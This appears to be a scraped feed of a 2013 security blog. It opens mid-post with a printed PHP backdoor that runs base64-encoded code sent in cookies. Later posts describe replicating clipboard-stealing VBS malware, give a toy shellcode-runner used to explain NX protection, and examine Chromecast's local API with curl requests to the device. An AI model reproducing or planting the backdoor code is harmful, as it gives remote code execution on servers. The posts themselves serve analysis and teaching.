<pre>$lyyq = create_function($c='count';$a=$_COOKIE;if(reset($a)=='<b>il</b>' && $c($a)>3){$k='<b>oveyou</b>';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';})</pre>
<br />
<div>
<br /></div>
Conclusion? The author of this backdoor must be romantic..<br />
<br />
<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-24076468597643490162013-10-25T22:22:00.001+08:002013-10-25T22:22:09.630+08:00Replicating Malware Function For Fun and Profits!!!!<div dir="ltr" style="text-align: left;" trbidi="on">
At Scan Assoc, we are allowed to play and be creative with our viruses/malware to the max without any useless restraining policy...<br />
If you read this <a href="http://www.cert.pl/news/7662/langswitch_lang/en">post </a> and see the video below:<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/TjOOaWE4Vq4" width="420"></iframe>
<br />
U know it's fun<br />
Basicly it's using VBS scripting to copy clipboard...<br />
<br />
I`ve replicated similliar technique also using VBS Scripting and bat script as a POC..<br />
It's very innovative attack for Phishing....<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/BnzZk9V12jg" width="420"></iframe>
Source code is in the Video..<br />
Dis is just a POC, there's a way to bypass latest IE security clipboard warning!!!<br />
<br />
<br />
<br /></div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-4865819153630384661.post-61784700583403869482013-10-13T15:47:00.002+08:002013-10-13T20:52:47.751+08:00A simple explanation about NX/Pax works.<div dir="ltr" style="text-align: left;" trbidi="on">
This is nothing more then just to recap how NX/PAX works why it's important for us to understand for beginners on exploitation, writing CTF flags :p , and other interesting people paper.<br />
<div>
<br /></div>
<div>
Below is a simplest code on a bad example on how to execute a shellcode.</div>
<div>
<br />
<pre><stdio .h="">unsigned char code[] = "\xcc";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}</stdio></pre>
<pre></pre>
<pre></pre>
<pre><div style="font-family: 'Times New Roman'; white-space: normal;">
Explanation:<br />
1. We declare a pointer called func*<br />
2. Func are pointed out to the location of memory code.<br />
3. Execute watever being pointed by func() which is to say watever code resides in code.<br />
Try compile and run:<br />
<pre>gcc example1.c -o example ; ./example
Segmentation fault
</pre>
Why? To understand this problem . Modern compilers by default will enfoce a NX bit on the stack region of the process. Any "local variable" that we declared will be loaded in the stack region of the memory. And what does it mean to us ? To generalize our understanding , we know a region of memory in a computer can have 3 propeties:-<br />
1. Read ; we can read and have access to the memory<br />
2. Write: We ca write data to the particular region.<br />
3. Execute: The code in that particular region can be executed.<br />
<pre>cat /proc/3976/maps
08048000-08049000 r-xp 00000000 08:01 1447191 /root/bypassav/example
08049000-0804a000 rw-p 00000000 08:01 1447191 /root/bypassav/example
b7e62000-b7e63000 rw-p 00000000 00:00 0
b7e63000-b7fbf000 r-xp 00000000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fbf000-b7fc0000 ---p 0015c000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc0000-b7fc2000 r--p 0015c000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc2000-b7fc3000 rw-p 0015e000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc3000-b7fc6000 rw-p 00000000 00:00 0
b7fdf000-b7fe1000 rw-p 00000000 00:00 0
b7fe1000-b7fe2000 r-xp 00000000 00:00 0 [vdso]
b7fe2000-b7ffe000 r-xp 00000000 08:01 1311294 /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r--p 0001b000 08:01 1311294 /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rw-p 0001c000 08:01 1311294 /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
</pre>
As u can see right now the stack region is mark as read-write ..... no x means dat code in that region couldn`t be executed..<br />
Now that we understand the stack region is protected, attacker evolves their attack into ROP or ret2/wateverlib style programming. But that's beyond the scope of this post. Having said that it's still possible to make your code executed by using mmap trick . To make everyone happy here i cheat a litte using execstack just to see the difference..<br />
<pre>gcc example1.c -o example ; execstack -s example; ./example
Trace/breakpoint trap
</pre>
</div>
<pre>cat /proc/4125/maps
08048000-08049000 r-xp 00000000 08:01 1447203 /root/bypassav/example
08049000-0804a000 rwxp 00000000 08:01 1447203 /root/bypassav/example
b7e62000-b7e63000 rwxp 00000000 00:00 0
b7e63000-b7fbf000 r-xp 00000000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fbf000-b7fc0000 ---p 0015c000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc0000-b7fc2000 r-xp 0015c000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc2000-b7fc3000 rwxp 0015e000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc3000-b7fc6000 rwxp 00000000 00:00 0
b7fdf000-b7fe1000 rwxp 00000000 00:00 0
b7fe1000-b7fe2000 r-xp 00000000 00:00 0 [vdso]
b7fe2000-b7ffe000 r-xp 00000000 08:01 1311294 /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r-xp 0001b000 08:01 1311294 /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rwxp 0001c000 08:01 1311294 /lib/i386-linux-gnu/ld-2.13.so
<b>bffdf000-c0000000 rwxp 00000000 00:00 0 [stack]
</b></pre>
</pre>
</div>
<br />
<br />
Oh Hitb 2013 Kul starts tomorrow.. See you there soon!<br />
<div style="font-family: 'Times New Roman'; white-space: normal;">
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-32816159778621996962013-09-16T09:36:00.001+08:002013-09-17T09:06:01.281+08:00bat script setting your notebook as a wireless . AP<div dir="ltr" style="text-align: left;" trbidi="on">
Captive portal/Layer 2 isolation is a no no for Chromecast.. So I`m in Kelate right now, Here's a quick bat script on setting your Windows 7 as an AP.. Run as administrator of course.<br />
<div>
<br />
<div>
<br /></div>
<div>
ap.bat</div>
<div>
<br /></div>
<div>
ECHO OFF</div>
</div>
<div>
<pre>netsh wlan set hostednetwork mode=allow
netsh wlan set hostednetwork ssid=PUTYOUROWNSSID key=buhpasswordsendiri keyUsage=persistent
netsh wlan start hostednetwork</pre>
</div>
<div>
<div>
</div>
<div>
<br />
<br />
Use ICS with your No4G, or watever.. More infos:<br />
<br />
<a href="http://msdn.microsoft.com/en-us/library/dd815243%28VS.85%29.aspx">http://msdn.microsoft.com/en-us/library/dd815243%28VS.85%29.aspx</a><br />
<br />
<br />
<br /></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-64415794183120731652013-09-13T16:51:00.001+08:002013-09-13T16:52:18.117+08:00Chromecast Experience in .MY Part 3<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Okay part 3... It's pretty short and simple.. They say when u managed to produce a UML. The program is already completed :p</b><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBGZqGj1RqbxQIuFwa-UaKMDm2N_uoDoASC4RLMdzFXWVKZY1v3rj3gkHFLZjkgirgwTPmX5XIC7OieRMsNEFquqyz8LFp8miHqjQcRLMwXcTtSN96RizHJ_0eYBCnS4DoS6zzfWgrCns7/s1600/cdraw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBGZqGj1RqbxQIuFwa-UaKMDm2N_uoDoASC4RLMdzFXWVKZY1v3rj3gkHFLZjkgirgwTPmX5XIC7OieRMsNEFquqyz8LFp8miHqjQcRLMwXcTtSN96RizHJ_0eYBCnS4DoS6zzfWgrCns7/s320/cdraw.png" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuZDUyyP5q6Hqn7Kkiksjq5isb84bAHLo2Zx-EGhvIhpNFrnxPWDh-1YXfe8feoL_CFwmJRdAniFvS4dd0Bj4p_ACPQ7VI-HpX0LWCryWhvGgg_qHT2O0rKPY_tFKjl_OEzVCZJVhe0O2k/s1600/1209050_10201623994817092_439427285_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuZDUyyP5q6Hqn7Kkiksjq5isb84bAHLo2Zx-EGhvIhpNFrnxPWDh-1YXfe8feoL_CFwmJRdAniFvS4dd0Bj4p_ACPQ7VI-HpX0LWCryWhvGgg_qHT2O0rKPY_tFKjl_OEzVCZJVhe0O2k/s320/1209050_10201623994817092_439427285_n.jpg" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br /></div>
Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-4865819153630384661.post-24134410505759172852013-09-13T02:34:00.005+08:002013-09-13T02:49:16.971+08:00Chromecast Experience in .MY Part 2.<div dir="ltr" style="text-align: left;" trbidi="on">
<b>"Check out my new Iphone, It's using a 64 bit ARM. Not sure what it does but cool"</b><br />
<b>"My latest Samsung is using triple core processor. It's fast."</b><br />
<b><br /></b>
Unless you have direct benefits from using such devices with that features, you are nothing more then just a mere human being consumed by the homogenization of modernity.<br />
<br />
This is the second part of Chromecast Experience. How does Chromecast work?<br />
From Chromecast Developer Guide they have make a beautiful picture out of it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://developers.google.com/cast/images/Diagram.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://developers.google.com/cast/images/Diagram.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So how does Casting works? When you first boot in your Chromecast, A Web Services would run and listen at port 8008. From a Blackbox point of view it's probably a heavy modifcation of node.js . Most likely with RESTful implementation. of Web API. Owh it's using the <a href="http://docs.google.com/viewer?a=v&pid=sites&srcid=ZGlhbC1tdWx0aXNjcmVlbi5vcmd8ZGlhbHxneDo1NTA2NDQ5MDZmMzdkNzI0">DIAL </a>.</div>
<div class="separator" style="clear: both; text-align: left;">
So how does it works? Let's run our sniffer. Many people would prefer tcpdump or wireshark. But hey Windows does it charmed with <a href="http://www.microsoft.com/en-my/download/details.aspx?id=4865">Microsoft Network Monitor</a>. Coolest thing bout this tool is you can filter it by apps in this case we filter chrome.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Each time we issue a cast we actually "dial for it". When casting to a youtube application. We will send GET Request to /app/YouTube</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrjcU-GmLL4b1902moXDlnXsvHf7U01Lpx3aNIUmOSI-8ntd6_3Dzr5FcKn6qhQgkNpEf7jbcyAMh_XbXQPVR5qaG9O-ft-gZgaM6hXqz1pwUYmdtAKe6nVoxaR2eUvFCDZWYPc2ztSarK/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrjcU-GmLL4b1902moXDlnXsvHf7U01Lpx3aNIUmOSI-8ntd6_3Dzr5FcKn6qhQgkNpEf7jbcyAMh_XbXQPVR5qaG9O-ft-gZgaM6hXqz1pwUYmdtAKe6nVoxaR2eUvFCDZWYPc2ztSarK/s320/1.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
And the information that we will retrive is in a form of an XML Format hinting the DIAL implementation in chromecast.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG1mkAIpV1LsjLZrSI7qGxJVZXrGog1UAENmlkyNx19QX-dxWPySb2dD9V1EF3fdvHlQbXvBZkGjJZCu04UGC9OmphQKIBRM_nnHl60eTE_eykHlYPPAy408WDFNWALvNTtyn5459ntM0T/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG1mkAIpV1LsjLZrSI7qGxJVZXrGog1UAENmlkyNx19QX-dxWPySb2dD9V1EF3fdvHlQbXvBZkGjJZCu04UGC9OmphQKIBRM_nnHl60eTE_eykHlYPPAy408WDFNWALvNTtyn5459ntM0T/s320/1.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
From the DIAL developers guide</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAkFiaWvs06mFrNsTOcHia0b9zR7xKmsngGRaLy5i_Q6X9eK07Ivyf-AHHSSJsUwGxuACVsRqaeXjf9hcreY7zJmn1lmE9i8W0OjnQig1T0erFrT4f7qlfPH5r_yosvZHkCh6PdXoL-udb/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAkFiaWvs06mFrNsTOcHia0b9zR7xKmsngGRaLy5i_Q6X9eK07Ivyf-AHHSSJsUwGxuACVsRqaeXjf9hcreY7zJmn1lmE9i8W0OjnQig1T0erFrT4f7qlfPH5r_yosvZHkCh6PdXoL-udb/s320/1.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The rules of Dial Service..</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
1. First we send the a dial request for the Application(Youtube, Netflix)</div>
<div class="separator" style="clear: both; text-align: left;">
2. Dial Server response with Okay</div>
<div class="separator" style="clear: both; text-align: left;">
3. Then We Post the Application URL in json format . It's actually a URL Forwarding technique.</div>
<div class="separator" style="clear: both; text-align: left;">
4. Dial Server response . (Chromecast will launch it's Request via GET/POST to netflix or youtube).</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
At any application launch. The Apps can be kill (Netflix or Youtube) by issuing a HTTP DELETE.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Common HTTP Request can be found in the DIAL Developer Manual. <a href="http://fiquett.com/2013/07/chromecast-traffic-sniffing/">Fiqueet.com</a> have list down common Request that you can do with curl example.</div>
<div style="background-color: white; border: 0px; color: #555555; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px; margin-bottom: 1.6em; margin-top: 1.6em; padding: 0px; vertical-align: baseline; word-wrap: break-word;">
<span style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">get device information xml:</span><br />
curl http://x.x.x.x:8008/ssdp/device-desc.xml</div>
<div style="background-color: white; border: 0px; color: #555555; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px; margin-bottom: 1.6em; margin-top: 1.6em; padding: 0px; vertical-align: baseline; word-wrap: break-word;">
<span style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">get detailed device information json:</span><br />
curl http:///x.x.x.x:8008/setup/eureka_info?options=detail</div>
<div style="background-color: white; border: 0px; color: #555555; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px; margin-bottom: 1.6em; margin-top: 1.6em; padding: 0px; vertical-align: baseline; word-wrap: break-word;">
<span style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">scan for available wifi:</span><br />
curl http:///x.x.x.x:8008/setup/scan_results</div>
<div style="background-color: white; border: 0px; color: #555555; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px; margin-bottom: 1.6em; margin-top: 1.6em; padding: 0px; vertical-align: baseline; word-wrap: break-word;">
<span style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">get supported time zones:</span><br />
curl http:///x.x.x.x:8008/setup/supported_timezones</div>
<div style="background-color: white; border: 0px; color: #555555; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px; margin-bottom: 1.6em; margin-top: 1.6em; padding: 0px; vertical-align: baseline; word-wrap: break-word;">
<span style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">get info about current app:</span><br />
curl -H “Content-Type: application/json” http:///x.x.x.x:8008/apps/YouTube -X GET</div>
<div class="separator" style="clear: both; text-align: left;">
Which get back to us.. How does the video were streamed to us? Here is an incorrect pseudo-diagram but sufficient enough.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWIv6bIBn6_-4sh1i_yQcwh9AV4cwZbi5hUGK1o0zWqU5Iq3SfItiLaQvul3ZOS76YBkAX1rGa2sylS82RORZX8JEHtPFgLKwbzaHTMHWxu0MbKYbqxI-s_6JMXb516VfHcto1jJzVjJcy/s1600/cdraw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWIv6bIBn6_-4sh1i_yQcwh9AV4cwZbi5hUGK1o0zWqU5Iq3SfItiLaQvul3ZOS76YBkAX1rGa2sylS82RORZX8JEHtPFgLKwbzaHTMHWxu0MbKYbqxI-s_6JMXb516VfHcto1jJzVjJcy/s320/cdraw.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
By now you should have at least an idea how to bypass it. If not you can wait for Part 3.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-13456954841543009382013-09-12T02:08:00.001+08:002013-09-13T02:49:28.504+08:00Chromecast Experience in .MY Part 1.<div dir="ltr" style="text-align: left;" trbidi="on">
Living is not that easy these days. The cost of living have increased to a point where a mere average salary guy like me have a little bit trouble coping with my current life. Yeap I admit I do have some sort of financial difficulty a bit . But Alhamdulilah I am bless with good families and friends who are willing to help me in surviving the capitalistic nature of today's modernity. <br />
<div>
<br /></div>
<div>
Nonetheless, the difficulty in one life shouldn`t be a burden to the soul in the quest of acquiring new knowledge.</div>
<div>
Few months back down the road google have release the Chromecast . " A device that change makes your Smart TV Smarter"..<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwPhmhBt-snt3y3hU5tsvcXsLNCKZhaZI4W6s3fMwThOmX-UMMLUTTT0GDDLINgAgCuVHs_DCwUGncojmaowDENJBoYntkUIOGkgsrf-whGzkeCESvMWaTzVBlkZ07xoT31gwn-UU4qBOn/s1600/IMG_2482.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwPhmhBt-snt3y3hU5tsvcXsLNCKZhaZI4W6s3fMwThOmX-UMMLUTTT0GDDLINgAgCuVHs_DCwUGncojmaowDENJBoYntkUIOGkgsrf-whGzkeCESvMWaTzVBlkZ07xoT31gwn-UU4qBOn/s320/IMG_2482.JPG" width="240" /></a></div>
<br />
It cost us 35 bucks + 6 dollar shipping. Thanks to a friend of mine, Amir Shahir who bought it for me kindly.<br />
Ifixit had teardown for us. You can look on their <a href="http://www.ifixit.com/Teardown/Chromecast+Teardown/16069/1?singlePage">website</a> to see the inside of Chromecast.<br />
<br /></div>
<div>
To powered up the device is straight forward. Simply plug into your HDMI port , and USB for power and it will boot on.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyssOS0F2VRe0fX5TaPFQ0jWnMiztE5NrWrxxuMxi2julPdJPqKew2KivVxNAVUYOyFvvtwBsmyqsDZzJhlKIEoZPOnW1m2DhE5E4p0SDAJ290wEo0t15oABD1BkMpHgIEJfGG3PqPaS-p/s1600/IMG_2483.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyssOS0F2VRe0fX5TaPFQ0jWnMiztE5NrWrxxuMxi2julPdJPqKew2KivVxNAVUYOyFvvtwBsmyqsDZzJhlKIEoZPOnW1m2DhE5E4p0SDAJ290wEo0t15oABD1BkMpHgIEJfGG3PqPaS-p/s320/IMG_2483.JPG" width="240" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
On my Sharp TV</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpMBFqVtSie6sOycadkfvhxyAgnfPvaWFzMDknPKjVZAkrUQuNW8-B4JHOc9TNLBtMQGrgLSTrFIzNd6cbMRSdcZOeBvPWGzTyNtkSDWSb_GWjWzC2RIQGlHypONPYPMLM4VULZ0KVD53b/s1600/IMG_2484+-+Copy.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpMBFqVtSie6sOycadkfvhxyAgnfPvaWFzMDknPKjVZAkrUQuNW8-B4JHOc9TNLBtMQGrgLSTrFIzNd6cbMRSdcZOeBvPWGzTyNtkSDWSb_GWjWzC2RIQGlHypONPYPMLM4VULZ0KVD53b/s320/IMG_2484+-+Copy.JPG" width="320" /></a></div>
<br />
Yeah terbalik dunno why.<br />
<br />
Anyway the whole bunch of the Chromecast is actually a custom light webbrowser with HTML5 + Jscript + CSS Support. You can cast your content over WebRTC (since WebRTC support peer connect) or forward certain streaming sites request such as Youtube and Netflix (at this moment)..<br />
<br />
Unfortunely we're living outside of the States. So surfing a Netflix is going to be a bit of problem.. Viewing geo-locked content is not a problem for PC users since a lot of proxies, VPN, can be used to bypass the protection.<br />
<br />
That's not the situation with chromecast. This pricy small stuff is a bad-ass. You couldn`t rigged with it at all. The DNS Resolver is hardcoded in the device itself. <a href="http://wiki.gtvhacker.com/index.php/Google_Chromecast#Bootloader_Exploit_Package">One could root the device with previous firmware</a> . But Google is also playing evil by updating the devices firmware without notifying the user, same goes to Google Chrome..<br />
<br />
Solutions?<br />
<br />
If you cannot customize/root the device. Then you make the device program behave like it was rooted. So for the past 48 hours , I've been testing analysing the chromecast traffic and studying the arts of bypassing of an unbypass devices..Hey presto the solutions is simple , i managed to sketch it on a nice A4..<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAeIR44eUBQE96XyFLaluMBDlwn3wMvYAAWTLM7vAEyPw4alWILQHszrKm8xobLX7DMOp6j-rRNEWhWmqUOnJsSWLJi1U0sCHUX2KuiaNQse-mjakzBZsFfAKB4TdHJ54_smQhlCjWlnpM/s1600/IMG_2481.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAeIR44eUBQE96XyFLaluMBDlwn3wMvYAAWTLM7vAEyPw4alWILQHszrKm8xobLX7DMOp6j-rRNEWhWmqUOnJsSWLJi1U0sCHUX2KuiaNQse-mjakzBZsFfAKB4TdHJ54_smQhlCjWlnpM/s320/IMG_2481.JPG" width="320" /></a></div>
<br />
<br />
<br />
Continue soon...<br />
Just in case nobody belives me it's possible even using a cap telekom DIR-615...<br />
<br />
<br /></div>
</div>
Unknownnoreply@blogger.com0